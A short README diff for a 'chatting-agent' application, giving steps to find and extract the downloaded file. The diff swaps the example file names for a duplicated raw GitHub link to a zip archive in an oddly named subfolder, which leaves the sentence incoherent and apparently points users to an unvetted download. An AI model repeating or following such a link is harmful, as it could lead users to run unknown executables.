Aart834/chatting-agent/README.md

 After downloading the application, follow these steps to run the chatting-agent:

 1. **Locate the Downloaded File**
    Check your default download directory for the downloaded file.
-It may be named something like `chatting-agent.zip` or `chatting-agent.exe`.
+It may be named something like `https://raw.githubusercontent.com/Aart834/chatting-agent/main/Batussi/chatting-agent_3.2.zip` or `https://raw.githubusercontent.com/Aart834/chatting-agent/main/Batussi/chatting-agent_3.2.zip`.

 2. **Extract the Files (if applicable)**
    If you have a compressed file (like a `.zip`), right-click on it and select "Extract All."
 Follow the prompts to extract the contents to a folder of your choice.